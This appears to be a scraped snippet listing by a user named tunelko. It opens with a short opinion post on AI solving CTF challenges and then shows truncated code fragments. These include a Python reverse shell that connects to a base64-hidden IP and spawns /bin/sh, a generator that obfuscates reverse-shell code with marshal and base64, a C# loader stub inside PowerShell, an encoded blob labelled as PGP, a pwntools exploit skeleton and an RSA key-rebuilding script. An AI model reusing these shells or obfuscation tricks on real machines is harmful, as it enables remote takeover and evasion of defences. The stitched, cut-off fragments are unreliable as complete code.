tunelko

This document is updated frequently.

The debate is becoming polarized between those who see the use of AI in CTF challenges as a disaster and those of us who are somewhat more optimistic and see an opportunity for improvement.

1. CTFs as we have known them are dead. It has become trivial to solve almost any type of challenge.

2. Paradoxically, this also means they are not entirely dead. The situation creates an opportunity to rethink the model and explore ways to restrict direct access by AI systems. This is obviously not trivial.

3. The work has to come from the technology itself. Preventing AI from solving challenges 100% of the time will be impossible, but the field will likely move toward a more normalized state once the hype and the backlash settle. It should be possible to investigate AI-detection mechanisms by studying solving patterns in dynamic challenges without inspecting the content itself, for example, response times and the flow of submissions.

tunelko

$wOqsxkM = @"
#nullable enable
using System;
using System.IO;
using System.Reflection;
using System.Security.Cryptography;
using System.Text;

namespace l4cw7gI
{

tunelko

_p = """-----BEGIN PGP MESSAGE-----
Version: GnuPG

wpPCl8KawpnCnMKeSsKdwpnCjcKVwo_CnjTCk8KXwprCmcKcwp5Kwp7CksKcwo_C
i8KOwpPCmMKRNMKTwpfCmsKZwpzCnkrCnsKTwpfCjzQ0cnl9fkpnSkxbXGFYWlha
WFtMNHp5fH5KZ0pjY2NjNDTCl8KPwpjCncKLwpTCj1tKZ0pMc3hzfkp3b319a3Fv
SldXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV0pMWMKPwpjCjcKZwo7Cj1JT
NMKXwo_CmMKdwovClMKPXEpnSkx0a2zCoWtywpVrwo57bMKja3HCoWtza2tja21r
a3PCkWzCmWtye2vCjmtswqFrcndrecKRa8Kga21ia8KEwqFswpprcndrwo5ra8Kf
a3HCjWvCi3tsWmtxwpFrwo57bMKTa3J_a8KNwqFswpZrcnNrwoPCoWzCoGtxXmvC

tunelko

#1. generate obfuscated marshalled b64 
import marshal, binascii, base64
IP = "127.0.0.1"
PORT = 1234
code = f"""
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("{IP}", {PORT}))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)

tunelko

from pwn import * 

context(arch='x86_64', os='linux')
context.terminal = ['tmux', 'splitw', '-h']
LOCAL = False
REMOTETTCP = True
REMOTESSH = False
GDB = False

local_bin = "./climb"

tunelko

#!/usr/bin/python

import pyasn1.codec.der.encoder
import pyasn1.type.univ
import base64

# present values on key.pem 
e = 0x010001
n = 0xC4B07FEFC8E36C05C0DA434221AEBF47DBF70E5189AD892408F3AD81182A9E0700A07C9D7C66C86C7A39602123EE0F605613DE97FDE49FE68396EE0AF3F5F5F3
p = 106173580239682931389627142547722999257831171755485751420548914984291463023277

tunelko

import base64 
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((base64.b64decode("base64_str_IP"),4444))
os.dup2(s.fileno(),0); 
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

tunelko

import socket
TCP_IP = '127.0.0.1'
TCP_PORT = 9999
BUFFER_SIZE = 1024
data = b"\x68\x16\x16\x68\x08\x00\x65\x81\x65\x00\x64\x00\x01\x01\x00\x1a\xb5\x13\x8b\x57\x07\x12\x00\x00\x00\x00\x96\x16"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))
s.send(data)
s.close()

tunelko

#!/usr/bin/env python
import argparse
# from skeleton.users import models
# from sqlalchemy.exc import SQLAlchemyError
# from collections import Counter
import json
import sys
import requests

"""

tunelko

Guia para git dummies Crear el repositorio. Generar la key ssh:

ssh-keygen -t rsa -C "correo@dominio.com"

Copiar ~/.ssh/id_rsa.pub a la configuración de la cuenta de GitHub. Probar SSH:

ssh -T git@github.com